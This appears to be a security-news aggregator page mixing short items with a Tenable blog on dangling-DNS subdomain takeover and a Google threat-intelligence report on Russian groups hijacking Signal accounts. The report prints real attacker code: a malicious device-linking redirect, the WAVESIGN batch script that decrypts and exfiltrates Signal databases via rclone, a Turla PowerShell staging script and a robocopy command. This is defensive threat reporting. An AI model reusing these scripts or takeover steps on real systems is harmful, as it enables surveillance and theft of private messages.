Aggregator

A structured look at what data to collect for security purposes and when to collect it.

一项对 16 个主要城市的研究发现，全球变暖正在帮助老鼠在世界各大城市茁壮成长，平均气温上升最快的地区，老鼠的数量增长也最快。直接估算一个城市的老鼠数量极其困难，弗吉尼亚州里士满大学的研究人员通过查看城市记录在案的老鼠投诉数量，了解老鼠种群的变化情况。他们获得了13 个美国城市以及东京、阿姆斯特丹和多伦多的数据。分析表明，美国新奥尔良、路易斯维尔和日本东京的老鼠数量正在下降，达拉斯和圣路易斯的老鼠数量保持稳定，而其他 11 个城市的老鼠数量正在上升，其中华盛顿特区、旧金山、多伦多、纽约和阿姆斯特丹的老鼠数量增长最快。研究发现，老鼠数量增长与平均气温上升的关系最为密切，其次是根据卫星照片评估的城市化程度，然后是人口密度，城市的 GDP 与老鼠数量的趋势没有明显关联。

Australia-based Genea said it is investigating the cyber incident to determine whether any personal data was accessed by an unauthorized third party

nmap扫描1、扫描TCP端口并保存# nmap -sT --min-rate 10000 -p- 10.10.11.152 -oA nmap/tcp PORT STATE SERVICE

Valve 上周从 Steam 平台移除了一款植入恶意程序的游戏 PirateFi。该游戏被发现会安装窃取敏感数据的恶意程序 Vidar，能窃取玩家的密码、cookie 和加密货币钱包。分析该恶意程序的安全研究人员 Marius Genheime 认为 PirateFi 就是为传播 Vidar 而开发的，它修改自游戏模板 Easy Survival RPG，其授权费用在 399-1,099 美元之间，这能解释黑客如何快速开发出一款能运行的游戏。Vidar 能窃取浏览器自动填写的网站密码、用于自动登录的会话 cookie、浏览历史记录、加密货币钱包、屏幕截图、特定令牌生成器的双因素代码，以及计算机上的其它文件。

在没有人工干预下成功自我克隆是人工智能战胜人类的重要一步，也是“流氓”人工智能的早期信号。

Fortinet today expanded the scope of its platform for security operations center (SOC) teams to add generative artificial intelligence (GenAI) capabilities, along with additional integrations with third-party platforms and other Fortinet services.

The post Fortinet Extends Scope and Reach of SOC Platform appeared first on Security Boulevard.

Mismanaging your DNS infrastructure could put you at risk of destructive cyberattacks – especially as your cloud attack surface expands. Read on to learn about DNS vulnerabilities, the impact of DNS takeover attacks, and best practices for DNS security, including how new Tenable plugins can help you.

Many organizations overlook the security of their domain name system (DNS) infrastructure, a grave mistake, particularly if their cloud adoption is growing. Mismanaging your DNS records can allow attackers to take over any of your subdomains that are inactive and forgotten. Once hackers control one of your subdomains, they can craft a variety of devastating cyberattacks.

In this blog, we’ll unpack how the DNS protocol works; outline common DNS vulnerabilities and their impacts; and drill down into detection, prevention and mitigation best practices. We’ll also explain how newly-released Tenable Vulnerability Management, Tenable Web App Scanning and Tenable Attack Surface Management plugins can help you secure your DNS infrastructure.

Why cloud growth intensifies the importance of DNS security

Organizations increasingly want to integrate new cloud services and SaaS applications into their IT infrastructure to provide them to their users and customers. As part of this process, organizations often create a custom subdomain for their users or customers to access these third-party cloud applications. 

In order to do this, organizations need to create a new DNS record. It’s critical for organizations to keep track of these DNS records so that attackers don’t hijack the custom subdomains. Unfortunately, DNS infrastructure management is often overlooked, creating a blindspot for the organization’s security team. 

DNS resolution basics

The DNS protocol, historically a critical component of the internet infrastructure, translates numerical IP addresses into human-readable names.

DNS protocol provides various record types, including these four:

• "A" records, which are the basic translation between a subdomain and an IPv4 address.
• Canonical Name (CNAME) records, which allow organizations to have more than one domain alias pointing to a single domain name linked to one IP address. For instance, five domain aliases can point to example.com. If the IP address tied to example.com ever changes, its DNS record is the only one that needs to be updated. The CNAME aliases that point to example.com can remain as they are. CNAME records never point directly to an IP address – only to other domain names. The target domain name can be either in the aliases' same domain name or in a different one.
• Mail Exchange (MX) records, which direct email traffic by specifying which mail servers are responsible for accepting incoming email messages for a domain.
• Name Server (NS) records, which identify which DNS servers are authoritative on a given DNS zone. An authoritative DNS server contains the DNS zone with all the records.

To map a third-party service to an organization’s custom domain, the third-party vendor will request to configure one of these four record types. Once the process is completed, the organization’s traffic will be properly routed via the custom domain. 

The following diagram shows a basic example of how a DNS resolution mechanism works for a CNAME record that isn’t already in any cache of the DNS resolution chain:

Chart showing how a DNS resolution mechanism works for a CNAME record that isn't already in any cache of the DNS resolution chain

The overall flow is similar for other record types such as MX or NS records.

Understanding DNS takeover vulnerabilities

The risk of a DNS takeover emerges when a DNS record is left dangling – meaning that the DNS record points to a subdomain that is inactive or was deleted. This would allow anyone to claim this DNS record from the third-party cloud service. 

A common scenario at the origin of such vulnerabilities is:

1. An organization’s business unit sets up a third-party cloud service for its internal users.
2. This business unit then asks the IT department to create a DNS CNAME record for this service to make it look more legit with an “organization” owned domain.
3. Later, the business unit decides to stop using this third-party cloud service but does not ask the IT department to remove the DNS CNAME record from the DNS zone.
4. Any user, including an attacker, can claim the custom subdomain from the cloud service provider, and configure it to host malicious content under the victim organization’s domain.

As an example, let’s take an organization that wants to host a basic static website on an AWS S3 storage bucket for an event, such as a two-day conference, and map a subdomain it owns such as mysuperstaticwebsite.acme.corp. By following the official AWS documentation, the service is provisioned and available to all intended users.

After the event ends, the organization takes the website hosted on S3 offline but forgets to remove the custom subdomain’s DNS record. 

The website now displays a generic error showing that the S3 bucket does not exist:

However, an attacker who looks at the DNS record for mysuperstaticwebsite.acme.corp would see the following configuration: 

dig +short CNAME mysuperstaticwebsite.acme.corp mysuperstaticwebsite.s3-website.eu-west-3.amazonaws.com.

Using this information, the attacker could then log on to the AWS console, create an S3 bucket named mysuperstaticwebsite in the eu-west-3 region and attract people who think they’re visiting the legitimate https://mysuperstaticwebsite.acme.corp website.

This risky scenario isn’t limited to CNAME records. MX, NS or A records are also vulnerable. For example, for around 5 years, a Mastercard DNS error went unnoticed just because of a typography issue in one of the NS records set on its az.mastercard.com. The record, using akam.me, was indeed targeting a non-existing domain which was available for registration. 

DNS takeovers can also happen when a domain name expires and is not renewed in the allocated time by the organization that owned it. The domain name then can be purchased by anyone, including hackers, leaving the previous owner open to multiple attack scenarios.

One takeover, multiple impacts

Organizations are often unaware of the potential impacts a DNS takeover attack can have, beyond damage to its brand reputation and to its customer confidence. 

Depending on the type of the compromised DNS record and the organization’s usage of this record, many exploitation vectors could have an impact on an organization's security, including:

• Phishing: Attackers can build realistic phishing websites hosted on a legitimate URL domain name to target the organization’s internal or external users.
• Email interception: MX records are a critical part of email infrastructure. When one or several MX records are left dangling and target-DNS records become unavailable, an attacker could take over the DNS records and receive e-mails intended for previous users of this service. This can have a huge impact. It can allow attackers, for example, to perform password-reset operations and log into active services from the organization. 
• Cookie tossing: Taking control of a subdomain could allow an attacker to set cookies for the parent domains and make them apply to other subdomains. Depending on how the cookies are handled on the other applications, this could help an attacker conduct further attacks.
•  Bypassing client-side security:
  • Content-Security Policy (CSP) allows website admins to control which resources a browser can load. If a compromised subdomain is in a CSP allow list, an attacker could exploit this vulnerability to bypass the CSP security controls and launch client-side attacks such as cross-site scripting (XSS).
  • A Cross-Origin Resource Sharing (CORS) policy defines the vulnerable subdomain in the allowed origins. An origin is a combination of the URI scheme, the host name and the port number, and adding it to the CORS policy defines the sources allowed to perform cross-site requests on a given web application. An attacker could host malicious JavaScript and exploit the CORS configuration to access sensitive information or perform operations on behalf of legitimate users.
• Cloud resources compromise: When the compromised target is, for example, a cloud resource such as a storage bucket or a database, it could have a broader impact on the rest of the infrastructure. For example, if a web application still refers to JavaScript static files on a storage bucket that has been taken over, an attacker could upload malicious JavaScript content and conduct stored XSS attacks on other internal or external web applications. 

The risks are even higher when the vulnerable record is an NS record. This type of record allows administrators to delegate the entire DNS zone management to a third-party server. If it is compromised, attackers can then create multiple other records in the delegated zone.

How to detect, prevent and mitigate

Mitigating DNS takeover vulnerabilities is not complex, and will mainly require following best practices for the lifecycle management of DNS records. 

For starters, you must have a well-established and documented process for provisioning external services so that you avoid these mistakes:

• The DNS record is created but you haven’t yet deployed the third-party cloud service.
• The DNS record is created and you’ve subscribed to the third-party cloud service, but you haven’t finalized the custom DNS configuration.
• The third-party cloud service is terminated but the DNS record is not removed from your organization’s DNS zone.

Instead, you must ensure that the DNS record is created only after the third-party cloud service has been created and configured. Once the third-party cloud service is no longer needed, the DNS record must be removed before the external service configuration is eliminated. 

If you are developing a SaaS application as a service provider, you should request customers to verify their domain name's ownership before assigning it a custom DNS record and routing it to your infrastructure. Common security protection requires organizations to add TXT DNS records in the subdomain DNS zone to confirm that they own the subdomain. It is also possible to generate a random and unique CNAME record to be used by each customer, preventing an attacker from re-using a previous CNAME record and hijacking the subdomain.

When attackers analyze an organization’s attack surface, they will enumerate the DNS records related to this organization and check if any dangling records exist. To achieve this, they will look for three different issues:

• Dangling services that provide an HTTP response. They will have a valid and resolvable DNS record, but will also provide a default HTTP response which can be used to fingerprint the vulnerable services.
• Dangling services with DNS resolution failure which, most of the time, have CNAME records targeting DNS records that are not resolvable, and makes the DNS resolver return an NXDOMAIN error.
• Dangling services targeting an IP address not allocated. Attackers can claim, for example, elastic IP addresses on public cloud infrastructures.

Tenable Vulnerability Management’s Attack Surface Management and Web App Scanning features let you comprehensively assess and remediate DNS security issues. By leveraging plugins 114146 (Subdomain Takeover) and 114572 (Danging DNS Record) in addition to Attack Surface Management capabilities, Web Application Scanning users can quickly check if their subdomain is targeting HTTP based dangling records and try fixing these issues before an attacker exploits them. 

Conclusion

Managing an organization’s attack surface requires solid DNS infrastructure management. While DNS records may seem like relics of early cloud adoption, the increasing complexity of modern architectures and rapid evolution of cloud services makes DNS infrastructure management more relevant than ever.

When attackers exploit DNS vulnerabilities, they can build an attack chain that can compromise user sessions, exfiltrate sensitive data or impersonate legacy services. That’s why organizations must embrace a proactive approach and adopt a solid DNS provisioning and management process.

Written by: Dan Black

Google Threat Intelligence Group (GTIG) has observed increasing efforts from several Russia state-aligned threat actors to compromise Signal Messenger accounts used by individuals of interest to Russia's intelligence services. While this emerging operational interest has likely been sparked by wartime demands to gain access to sensitive government and military communications in the context of Russia's re-invasion of Ukraine, we anticipate the tactics and methods used to target Signal will grow in prevalence in the near-term and proliferate to additional threat actors and regions outside the Ukrainian theater of war.

Signal's popularity among common targets of surveillance and espionage activity—such as military personnel, politicians, journalists, activists, and other at-risk communities—has positioned the secure messaging application as a high-value target for adversaries seeking to intercept sensitive information that could fulfill a range of different intelligence requirements. More broadly, this threat also extends to other popular messaging applications such as WhatsApp and Telegram, which are also being actively targeted by Russian-aligned threat groups using similar techniques. In anticipation of a wider adoption of similar tradecraft by other threat actors, we are issuing a public warning regarding the tactics and methods used to date to help build public awareness and help communities better safeguard themselves from similar threats.

We are grateful to the team at Signal for their close partnership in investigating this activity. The latest Signal releases on Android and iOS contain hardened features designed to help protect against similar phishing campaigns in the future. Update to the latest version to enable these features.

Phishing Campaigns Abusing Signal's "Linked Devices" Feature

The most novel and widely used technique underpinning Russian-aligned attempts to compromise Signal accounts is the abuse of the app's legitimate "linked devices" feature that enables Signal to be used on multiple devices concurrently. Because linking an additional device typically requires scanning a quick-response (QR) code, threat actors have resorted to crafting malicious QR codes that, when scanned, will link a victim's account to an actor-controlled Signal instance. If successful, future messages will be delivered synchronously to both the victim and the threat actor in real-time, providing a persistent means to eavesdrop on the victim's secure conversations without the need for full-device compromise.

• In remote phishing operations observed to date, malicious QR codes have frequently been masked as legitimate Signal resources, such as group invites, security alerts, or as legitimate device pairing instructions from the Signal website.

• In more tailored remote phishing operations, malicious device-linking QR codes have been embedded in phishing pages crafted to appear as specialized applications used by the Ukrainian military.

• Beyond remote phishing and malware delivery operations, we have also seen malicious QR codes being used in close-access operations. APT44 (aka Sandworm or Seashell Blizzard, a threat actor attributed by multiple governments to the Main Centre for Special Technologies (GTsST) within Main Directorate of the General Staff of the Armed Forces of the Russian Federation (GU), known commonly as the GRU) has worked to enable forward-deployed Russian military forces to link Signal accounts on devices captured on the battlefield back to actor-controlled infrastructure for follow-on exploitation.

Notably, this device-linking concept of operations has proven to be a low-signature form of initial access due to the lack of centralized, technology-driven detections and defenses that can be used to monitor for account compromise via newly linked devices; when successful, there is a high risk that a compromise can go unnoticed for extended periods of time.

UNC5792: Modified Signal Group Invites

To compromise Signal accounts using the device-linking feature, one suspected Russian espionage cluster tracked as UNC5792 (which partially overlaps with CERT-UA's UAC-0195) has altered legitimate "group invite" pages for delivery in phishing campaigns, replacing the expected redirection to a Signal group with a redirection to a malicious URL crafted to link an actor-controlled device to the victim's Signal account.

• In these operations, UNC5792 has hosted modified Signal group invitations on actor-controlled infrastructure designed to appear identical to a legitimate Signal group invite.

• In each of the fake group invites, JavaScript code that typically redirects the user to join a Signal group has been replaced by a malicious block containing the Uniform Resource Identifier (URI) used by Signal to link a new device to Signal (i.e., "sgnl://linkdevice?uuid="), tricking victims into linking their Signal accounts to a device controlled by UNC5792.

Figure 1: Example modified Signal group invite hosted on UNC5792-controlled domain "signal-groups[.]tech"

function doRedirect() { if (window.location.hash) { var redirect = "sgnl://signal.group/" + window.location.hash document.getElementById('go-to-group').href = redirect window.location = redirect } else { document.getElementById('join-button').innerHTML = "No group found." window.onload = doRedirect

Figure 2: Typical legitimate group invite code for redirection to a Signal group

function doRedirect() { var redirect = 'sgnl://linkdevice uuid=h_8WKmzwam_jtUeoD_NQyg%3D%3D pub_key=Ba0212mHrGIy4t%2FzCCkKkRKwiS0osyeLF4j1v8DKn%2Fg%2B' //redirect=encodeURIComponent(redirect) document.getElementById('go-to-group').href = redirect window.location = redirect window.onload = doRedirect

Figure 3: Example of UNC5792 modified redirect code used to link the victim's device to an actor-controlled Signal instance

UNC4221: Custom-Developed Signal Phishing Kit

UNC4221 (tracked by CERT-UA as UAC-0185) is an additional Russia-linked threat actor who has actively targeted Signal accounts used by Ukrainian military personnel. The group operates a tailored Signal phishing kit designed to mimic components of the Kropyva application used by the Armed Forces of Ukraine for artillery guidance. Similar to the social engineering approach used by UNC5792, UNC4221 has also attempted to mask its device-linking functionality as an invite to a Signal group from a trusted contact. Different variations of this phishing kit have been observed, including:

• Phishing websites that redirect victims to secondary phishing infrastructure masquerading as legitimate device-linking instructions provisioned by Signal (Figure 4)

• Phishing websites with the malicious device-linking QR code directly embedded into the primary Kropyva-themed phishing kit (Figure 5)

• In earlier operations in 2022, UNC4221 phishing pages were crafted to appear as a legitimate security alert from Signal (Figure 6)

Figure 4: Malicious device-linking QR code hosted on UNC4221-controlled domain "signal-confirm[.]site"

Figure 5: UNC4221 phishing page mimicking the networking component of Kropyva hosted at "teneta.add-group[.]site". The page invites the user to "Sign in to Signal" (Ukrainian: "Авторизуватись у Signal"), which in turn displays a QR code linked to an UNC4221-controlled Signal instance.

Figure 6: Phishing page crafted to appear as a Signal security alert hosted on UNC4221-controlled domain signal-protect[.]host

Notably, as a core component of its Signal targeting, UNC4221 has also used a lightweight JavaScript payload tracked as PINPOINT to collect basic user information and geolocation data using the browser's GeoLocation API. In general, we expect to see secure messages and location data to frequently feature as joint targets in future operations of this nature, particularly in the context of targeted surveillance operations or support to conventional military operations.

Wider Russian and Belarusian Efforts to Steal Messages From Signal

Beyond targeted efforts to link additional actor-controlled devices to victim Signal accounts, multiple known and established regional threat actors have also been observed operating capabilities designed to steal Signal database files from Android and Windows devices.

• APT44 has been observed operating WAVESIGN, a lightweight Windows Batch script, to periodically query Signal messages from a victim's Signal database and exfiltrate those most recent messages using Rclone (Figure 7).

• As reported in 2023 by the Security Service of Ukraine (SSU) and the UK's National Cyber Security Centre (NCSC), the Android malware tracked as Infamous Chisel and attributed by the respective organizations to Sandworm, is designed to recursively search for a list of file extensions including the local database for a series of messaging applications, including Signal, on Android devices.

• Turla, a Russian threat actor attributed by the United States and United Kingdom to Center 16 of the Federal Security Service (FSB) of the Russian Federation, has also operated a lightweight PowerShell script in post-compromise contexts to stage Signal Desktop messages for exfiltration (Figure 8).

• Extending beyond Russia, Belarus-linked UNC1151 has used the command-line utility Robocopy to stage the contents of file directories used by Signal Desktop to store messages and attachments for later exfiltration (Figure 9).

if %proflag%==1 ( C:\ProgramData\Signal\Storage\sqlcipher.exe %new% "PRAGMA key=""x'%key%'"";" ".recover" > NUL copy /y %new% C:\ProgramData\Signal\Storage\Signal\sqlorig\db.sqlite C:\ProgramData\Signal\Storage\rc.exe copy -P -I --log-file=C:\ProgramData\Signal\Storage\rclog.txt --log-level INFO C:\ProgramData\Signal\Storage\Signal\sqlorig si:SignalFresh/sqlorig del C:\ProgramData\Signal\Storage\Signal\log* rmdir /s /q C:\ProgramData\Signal\Storage\sql move C:\ProgramData\Signal\Storage\Signal\sql C:\ProgramData\Signal\Storage\sql ) ELSE ( C:\ProgramData\Signal\Storage\sqlcipher.exe %old% "PRAGMA key=""x'%key%'"";" ".recover" > NUL C:\ProgramData\Signal\Storage\sqlcipher.exe %old% "PRAGMA key=""x'%key%'"";select count(*) from sqlite_master;ATTACH DATABASE '%old_dec%' AS plaintext KEY '';SELECT sqlcipher_export('plaintext');DETACH DATABASE plaintext;" C:\ProgramData\Signal\Storage\sqlcipher.exe %new% "PRAGMA key=""x'%key%'"";" ".recover" > NUL C:\ProgramData\Signal\Storage\sqlcipher.exe %new% "PRAGMA key=""x'%key%'"";select count(*) from sqlite_master;ATTACH DATABASE '%new_dec%' AS plaintext KEY '';SELECT sqlcipher_export('plaintext');DETACH DATABASE plaintext;" C:\ProgramData\Signal\Storage\sqldiff.exe --primarykey --vtab %old_dec% %new_dec% > %diff_name% del /s %old_dec% %new_dec% rmdir /s /q C:\ProgramData\Signal\Storage\sql move C:\ProgramData\Signal\Storage\Signal\sql C:\ProgramData\Signal\Storage\sql powershell -Command "move C:\ProgramData\Signal\Storage\log.tmp C:\ProgramData\Signal\Storage\Signal\log$(Get-Date -f """ddMMyyyyHHmmss""").tmp" )

Figure 7: Code snippet from WAVESIGN used by APT44 to exfiltrate Signal messages

$TempPath = $env:tmp $TempPath = $env:temp $ComputerName = $env:computername $DFSRoot = "\\redacted" $RRoot = $DFSRoot + "resource\" $frand = Get-Random -Minimum 1 -Maximum 10000 Get-ChildItem "C:\Users\..\AppData\Roaming\SIGNAL\config.json" | Out-File $treslocal -Append Get-ChildItem "C:\Users\..\AppData\Roaming\SIGNAL\sql\db.sqlite" | Out-File $treslocal -Append Get-ChildItem "C:\Users\..\AppData\Roaming\SIGNAL\config.json" | Out-File $treslocal -Append Get-ChildItem "C:\Users\..\AppData\Roaming\SIGNAL\sql\db.sqlite" | Out-File $treslocal -Append $file1 = $ComputerName + "_" + $frand + "sig.zip" $zipfile = $TempPath + "\" + $file1 $resfile = $RRoot + $file1 Compress-Archive -Path "C:\Users\..\AppData\Roaming\SIGNAL\config.json" -DestinationPath $zipfile Copy-Item -Path $zipfile -Destination $resfile -Force Remove-Item -Path $zipfile -Force

Figure 8: PowerShell script used by Turla to exfiltrate Signal messages

C:\Windows\system32\cmd.exe /C cd %appdata% && robocopy "%userprofile%\AppData\Roaming\Signal" C:\Users\Public\data\signa /S

Figure 9: Robocopy command used by UNC1151 to stage Signal file directories for exfiltration

Outlook and Implications

The operational emphasis on Signal from multiple threat actors in recent months serves as an important warning for the growing threat to secure messaging applications that is certain to intensify in the near-term. When placed in a wider context with other trends in the threat landscape, such as the growing commercial spyware industry and the surge of mobile malware variants being leveraged in active conflict zones, there appears to be a clear and growing demand for offensive cyber capabilities that can be used to monitor the sensitive communications of individuals who rely on secure messaging applications to safeguard their online activity.

As reflected in wide ranging efforts to compromise Signal accounts, this threat to secure messaging applications is not limited to remote cyber operations such as phishing and malware delivery, but also critically includes close-access operations where a threat actor can secure brief access to a target's unlocked device. Equally important, this threat is not only limited to Signal, but also extends to other widely used messaging platforms, including WhatsApp and Telegram, which have likewise factored into the targeting priorities of several of the aforementioned Russia-aligned groups in recent months. For an example of this wider targeting interest, see Microsoft Threat Intelligence's recent blog post on a COLDRIVER (aka UNC4057 and Star Blizzard) campaign attempting to abuse the linked device feature to compromise WhatsApp accounts.  

Potential targets of government-backed intrusion activity targeting their personal devices should adopt practices to help safeguard themselves, including:

• Enable screen lock on all mobile devices using a long, complex password with a mix of uppercase and lowercase letters, numbers, and symbols. Android supports alphanumeric passwords, which offer significantly more security than numeric-only PINs or patterns.

• Install operating system updates as soon as possible and always use the latest version of Signal and other messaging apps.

• Ensure Google Play Protect is enabled, which is on by default on Android devices with Google Play Services. Google Play Protect checks your apps and devices for harmful behavior and can warn users or block apps known to exhibit malicious behavior, even when those apps come from sources outside of Play.

• Audit linked devices regularly for unauthorized devices by navigating to the "Linked devices" section in the application's settings.

• Exercise caution when interacting with QR codes and web resources purporting to be software updates, group invites, or other notifications that appear legitimate and urge immediate action.

• If available, use two-factor authentication such as fingerprint, facial recognition, a security key, or a one-time code to verify when your account is logged into or linked to a new device.

• iPhone users concerned about targeted surveillance or espionage activity should consider enabling Lockdown Mode to reduce their attack surface.

aside_block

<ListValue: [StructValue([('title', 'More insights on this threat activity'), ('body', <wagtail.rich_text.RichText object at 0x3e07e83f7400>), ('btn_text', 'Listen now'), ('href', 'https://open.spotify.com/episode/3reADyxut9u4ueSPlCma8I'), ('image', <GAEImage: Defender's Advantage podcast>)])]>

Indicators of Compromise

To assist organizations hunting and identifying activity outlined in this blog post, we have included indicators of compromise (IOCs) in a GTI Collection for registered users.

See Table 1 for a sample of relevant indicators of compromise.

Actor

Indicator of Compromise

Context 

UNC5792

e078778b62796bab2d7ab2b04d6b01bf

Example of altered group invite HTML code 

add-signal-group[.]com

add-signal-groups[.]com

group-signal[.]com

groups-signal[.]site

signal-device-off[.]online

signal-group-add[.]com

signal-group[.]site

signal-group[.]tech

signal-groups-add[.]com

signal-groups[.]site

signal-groups[.]tech

signal-security[.]online

signal-security[.]site

signalgroup[.]site

signals-group[.]com

Fake group invite phishing pages

UNC4221

signal-confirm[.]site

confirm-signal[.]site

Device-linking instructions phishing page

signal-protect[.]host

Fake Signal security alert 

teneta.join-group[.]online

teneta.add-group[.]site

group-teneta[.]online

helperanalytics[.]ru

group-teneta[.]online

teneta[.]group

group.kropyva[.]site

Fake Kropyva group invites 

APT44

150.107.31[.]194:18000

Dynamically generated device-linking QR code provisioned by APT44

a97a28276e4f88134561d938f60db495

b379d8f583112cad3cf60f95ab3a67fd

b27ff24870d93d651ee1d8e06276fa98

WAVESIGN batch scripts 

Table 1: Relevant indicators of compromise

See Table 2 for a summary of the different actors, tactics, and techniques used by Russia and Belarus state-aligned threat actors to target Signal messages.

Threat Actor 

Tactic 

Technique

UNC5792

Linked device

Remote phishing operations using fake group invites to pair a victim's Signal messages to an actor-controlled device

UNC4221

Linked device

Remote phishing operations using fake military web applications and security alerts to pair a victim's Signal messages to an actor-controlled device

APT44

Linked device

Close-access physical device exploitation to pair a victim's Signal messages to an actor-controlled device

Signal Android database theft

Android malware (Infamous Chisel) tailored to exfiltrate Signal database files

Signal Desktop database theft 

Windows Batch script tailored to periodically exfiltrate recent Signal messages via Rclone

Turla

Signal Desktop database theft 

Post-compromise activity in Windows environments

UNC1151

Signal Desktop database theft 

Use of Robocopy to stage Signal Desktop file directories for exfiltration

Table 2: Summary of observed threat activity targeting Signal messages

Echoworx has unveiled its “Manage Your Own Keys” (MYOK) feature, powered by AWS Key Management Service (AWS KMS), an Amazon Web Services (AWS) service. This solution gives businesses greater control over sensitive data by allowing them to generate, manage, and secure their own encryption keys. The launch addresses growing concerns over data sovereignty and unauthorized access, empowering organizations to protect their information from cyber threats, unauthorized parties, and even service providers. Built on AWS KMS, … More →

The post Echoworx launches Manage Your Own Keys feature powered by AWS appeared first on Help Net Security.

Linux 内核开发者在邮件列表上继续围绕是否合并 Rust 代码展开辩论。DMA 映射助手维护者 Christoph Hellwig 是坚定的反 Rust 派，他认为内核引入 Rust 代码会创造碎片化，增加维护者的负担。对于 Miguel Ojeda 创建的 rust 内核政策网页，Hellwig 认为没有什么用，他说 Linus Torvalds 曾私下表示会不顾维护者的反对意见合并 Rust 代码。所以到目前为止，作为一名 Linux 开发者或维护者，无论是否愿意，都必须与 Rust 打交道。现在的规则是 Linus 能强迫你做任何他想做的事（Linux 显然是他的项目），“我认为他需要非常清楚的说出来，包括对贡献者的期望。”

俄罗斯APT组织滥用Signal“关联设备”功能，通过恶意二维码劫持账户，窃听安全对话，威胁乌克兰军方及个人用户，攻击手法或将扩展至其他通讯平台。

The head of the Australian Security Intelligence Organisation gave his Annual Threat Assessment for the year ahead